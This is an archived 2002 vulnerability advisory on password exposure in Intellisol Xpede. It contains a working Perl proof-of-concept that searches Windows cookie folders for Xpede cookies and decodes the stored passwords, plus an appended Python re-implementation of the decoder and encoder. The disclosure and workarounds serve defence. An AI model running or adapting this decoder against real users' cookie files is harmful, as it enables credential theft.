Xpede passwords exposed (2 vuln.)

From: Gregory Duchemin (c3rb3rat_private)
Date: Fri Mar 22 2002 - 05:04:31 PST

    Passwords exposed in Intellisol XPede
    ==========================
    
    
    About Xpede
    =========
    
    quote from 
    http://www.workforceroi.com/solutions/pa/index.shtml
    
    "Intellisol Xpede is a browser-based time and 
    expense entry and project cost management module 
    designed to connect a remote workforce on a real-
    time basis. 
    Intellisol Project Accounting is designed for any 
    professional service organization such as consulting, 
    software development, law, architecture, 
    engineering, PR/advertising and more with between 
    10 and 500 million dollars in revenue and up to 500 
    employees, 
    and integrates with Microsoft Great Plains Business 
    Solutions financial suites. "
    
    
    Problems
    =======
    
    Tested with Xpede 4.1 / NT 4.0
    Two security vulnerabilities have been discovered in 
    the way Xpede handles user passwords.
    
    1/    Xpede's cookies store the user's password 
    "ciphered" in a very weak manner (a mix of 
    shifts and permutations). The permutation and shift 
    tables are fixed constants (see the proof of concept 
    below), so no per-user secret is needed to reverse 
    them, and recovering the clear-text password from 
    the cookie is trivial. Users are therefore remotely 
    exposed through cross-site-scripting attacks and 
    various MSIE bugs that disclose cookies, and locally 
    exposed to anyone who can read the cookie file on 
    the filesystem, for instance when a user works on 
    someone else's computer or shares Administrator 
    rights on a machine with others.
    
    2/   Passwords appear in clear in the source of 
    the "session timeout" re-authentication popup. 
    The offending JavaScript snippet simulates 
    a "remember password" option and tests whether it was 
    checked in order to fill in the form's 
    password field automatically. 
    The clear password is embedded as-is in the JavaScript 
    source, regardless of what the user chose for 
    that option.
    A user therefore gets a false sense of safety: 
    leaving the host even for a few seconds without having 
    completed the authentication popup 
    exposes the password to anyone 
    viewing the page source, and the page is, once again, 
    remotely exposed to the same MSIE bugs mentioned above.
    
    
    Temp workarounds
    =============
    
    1st problem /   Clear all cookies via 
    MSIE "Tools/Internet Options/General/Delete 
    Cookies" right after a session has ended, 
    to avoid the local attack, and patch your browser with 
    the latest security fixes if that is not already done 
    (in the latter case you may fall into more serious 
    trouble anyway :).
    
    2nd problem /  Do not leave the authentication 
    popup exposed to unwise eyes (log in or quit the 
    application) and, again, patch your browser against 
    the remote attacks.
    
    
    Additionally, for the paranoid, I suggest closing all 
    running MSIE windows before accessing the Xpede 
    application (and during the session).
    
    
    
    Vendor status
    =========
    
    The vendor was contacted on March 13 and, as 
    far as I know, is currently working on a patch; 
    in the meantime, you may want to use the above 
    workarounds. 
    
    
    
    Versions
    ======
    
    Xpede support team has reported that both Xpede 4.1 
    and 7.x series were affected by these vulnerabilities.
    
    
     Author & Date
    ===========
    
    Gregory Duchemin (c3rb3rat_private)
    20 March 2002.
    
    
    Have a nice day.
    
    
    
    Proof of concept (password recovery from cookies)
    ====================================
    
#!/usr/bin/perl
# Xdeep.pl, search for and decipher Xpede passwords stored in these damn cookies
# Pr00f of concept, not to be used for illegal purposes.
#
# Author: Gregory Duchemin Aka c3rb3r // March 2002
#
use strict;
use warnings;

# Output format (formats need package variables, hence "our")
our ($userid, $realname, $company, $password);

format STDOUT =
+ Userid: @<<<<<<<
$userid
+ Realname: @<<<<<<<<<<<<<<<<<<<<<<<<<
$realname
+ Company: @<<<<<<<<<<<<<<<<<<<<
$company
+ Encoded password: @<<<<<<<<<<<<<<<<<<<<
$password
.

# Cookie fingerprint: an Xpede cookie file starts with this field name
my $signature = "defPWD";

# Decoding tables, identical for every user: for each output position the
# 1-based position to read from, the 52-letter alphabet, and the shift added
# to each letter after the permutation
my @PERMU = (9, 11, 2, 6, 4, 10, 1, 8, 7, 3, 5);
my @ALPHA = ('A' .. 'Z', 'a' .. 'z');
my @SHIFT = (9, 5, 17, 26, 17, 22, 6, 2, 25, 6, 23);

# Change the following path to match your system (forward slashes are accepted
# by Win32 and keep glob() from treating backslashes as escapes)
my @COOKIE = glob('c:/winnt/Profiles/*/Cookies/*@*.txt');

my $count = 0;
my @FOUND;

print "\n\nXdeep.pl  Xpede cookies finder and decoder\n\n",
      "-- Gregory Duchemin (Aka C3rb3r) ^ Feb 2002 --\n\n\n";

# Pass 1: fingerprint every cookie file by its first line
foreach my $try (@COOKIE) {
    $count++;
    open(my $handle, '<', $try) or next;
    my $first = <$handle>;
    close($handle);
    if (defined $first && index($first, $signature) == 0) {
        printf("\n+ Xpede cookie found ! yep :)  <=>  %s\n", $try);
        push @FOUND, $try;
    }
}

printf("\n+ %d files checked.\n", $count);

if (!@FOUND) {
    print "\n\n- No Xpede cookie found, sorry\n\n";
    exit(0);
}

printf("\n\n+ %d Cookie(s) found.\n", scalar @FOUND);
print "\n\n\n[Press return]\n";
<STDIN>;

# Pass 2: pull the fields out of each cookie file and decode the password
foreach my $try (@FOUND) {
    open(my $handle, '<', $try) or next;
    my @lines = <$handle>;
    close($handle);

    # Fixed line offsets of the MSIE cookie file (one name or value per line)
    ($userid, $realname, $password, $company) =
        map { defined $_ ? $_ : '' } @lines[55, 64, 46, 28];

    # Values are form-encoded: '+' is a space and %XX is a byte
    foreach my $field ($userid, $realname, $password, $company) {
        chomp $field;
        $field =~ s/\+/ /g;
        $field =~ s/%([a-f0-9]{2})/chr(hex($1))/eig;
    }

    printf "\n+ Found Xpede cookie :\n>> %s <<\n\n", $try;
    write;
    print "\n\n! Cr4cking 1n progr3ss ... \n";

    # Only the last 11 characters are scrambled; anything before them is
    # stored in clear and belongs at the end of the recovered password
    my @list = split //, $password;
    my $MAX  = 11;
    my $REST = '';
    if (@list > $MAX) {
        $REST = join '', splice(@list, 0, @list - $MAX);
        printf "\n+ Clear part is %s\n", $REST;
    } else {
        $MAX = scalar @list;
        print "\n- No clear part found \n";
    }

    # Step 1: undo the permutation (PERMU holds 1-based source positions;
    # passwords shorter than 11 characters are not covered by this scheme)
    my $temp_pass = join '', map { $list[$PERMU[$_] - 1] // '' } 0 .. $MAX - 1;
    printf "\n+ Permutations give %s\n", $temp_pass;

    # Step 2: shift every letter forward by its position's key value;
    # digits and punctuation pass through unchanged
    my $decode = '';
    my @chars  = split //, $temp_pass;
    for my $i (0 .. $#chars) {
        my $in  = $chars[$i];
        my $out = $in;
        for my $z (0 .. 51) {
            if ($ALPHA[$z] eq $in) { $out = $ALPHA[($z + $SHIFT[$i]) % 52]; last; }
        }
        $decode .= $out;
        printf "\n+ %s Shift(%d) \t --> \t%s", $in, $SHIFT[$i], $out;
    }

    printf "\n\n+ Shifting with secret key give %s\n", $decode;
    printf "\n! Password is \"%s\"\n\n", $decode . $REST;
    printf "\n\n- End.\n\n";

    print "\n\n[Press return]\n";
    <STDIN>;
}
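The scheme Xdeep.pl recovers, re-implemented in Python as an added example (not part of the original post and not Xpede's code) together with its inverse, so the point of problem 1 can be checked end to end: with the permutation and shift tables fixed, encoding is a keyless substitution that anyone holding the cookie can reverse, and digits or punctuation in the password are only moved, never changed. PERMU, SHIFT and the alphabet are copied from the Perl script; encode() is derived here by inverting decode(), on the assumption that the script's reading of the scheme is exact. The sample passwords are constructed.

```python
"""Xpede cookie password obfuscation as recovered by Xdeep.pl, with its inverse.
Added example; the tables come from the Perl script, the encoder is the
decoder run backwards (assumption: the script's reading of the scheme is exact)."""
from string import ascii_lowercase, ascii_uppercase
from urllib.parse import unquote_plus

ALPHA = ascii_uppercase + ascii_lowercase        # 52 letters, 'A'..'Z' then 'a'..'z'
PERMU = (9, 11, 2, 6, 4, 10, 1, 8, 7, 3, 5)      # 1-based source position per output position
SHIFT = (9, 5, 17, 26, 17, 22, 6, 2, 25, 6, 23)  # per-position shift, the same for every user
BLOCK = len(PERMU)                               # only the last 11 characters are scrambled


def _shift(ch: str, by: int) -> str:
    """Shift a letter within the 52-letter alphabet; anything else passes through."""
    i = ALPHA.find(ch)
    return ch if i < 0 else ALPHA[(i + by) % len(ALPHA)]


def decode(cookie_value: str) -> str:
    """Clear password from the (already URL-decoded) defPWD cookie value.

    Mirrors Xdeep.pl: the last 11 characters are un-permuted and then shifted
    forward; whatever precedes them was stored in clear and goes at the end.
    """
    if len(cookie_value) < BLOCK:
        # The posted script does not define the short case (assumption: not valid input)
        raise ValueError("encoded value shorter than the 11-character block")
    clear_tail, body = cookie_value[:-BLOCK], cookie_value[-BLOCK:]
    permuted = "".join(body[p - 1] for p in PERMU)
    unshifted = "".join(_shift(c, SHIFT[i]) for i, c in enumerate(permuted))
    return unshifted + clear_tail


def encode(password: str) -> str:
    """Inverse of decode(): the value a cookie would carry for this password."""
    if len(password) < BLOCK:
        raise ValueError("password shorter than the 11-character block")
    head, clear_tail = password[:BLOCK], password[BLOCK:]
    shifted = [_shift(c, -SHIFT[i]) for i, c in enumerate(head)]
    body = [""] * BLOCK
    for i, p in enumerate(PERMU):   # put each character back where decode() reads it from
        body[p - 1] = shifted[i]
    return clear_tail + "".join(body)


def decode_cookie_field(raw: str) -> str:
    """Cookie text is form-encoded ('+' for space, %XX for bytes), as the script handles."""
    return decode(unquote_plus(raw))


def plain_positions(password: str) -> list:
    """Indices of password characters that appear verbatim in the cookie value:
    non-letters inside the block (only moved) and everything after the block."""
    leaked = [i for i, c in enumerate(password[:BLOCK]) if c not in ALPHA]
    return leaked + list(range(BLOCK, len(password)))


if __name__ == "__main__":
    # Constructed sample passwords, not real cookie values
    for pw in ("Secret2002pw", "AAAAAAAAAAA"):
        enc = encode(pw)
        print(f"{pw!r:16} -> cookie {enc!r:16} -> decoded {decode(enc)!r}"
              f"  leaked positions {plain_positions(pw)}")
    print("from a form-encoded field:", decode_cookie_field("x%75jujdabyrev"))
```

Two identical passwords always produce identical cookie values, which is the practical test that no secret is involved: anyone who can read one cookie (XSS, an MSIE cookie-disclosure bug, or the cookie file on a shared machine) can run decode() on it.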
    



    This archive was generated by hypermail 2b30 : Fri Mar 22 2002 - 08:51:24 PST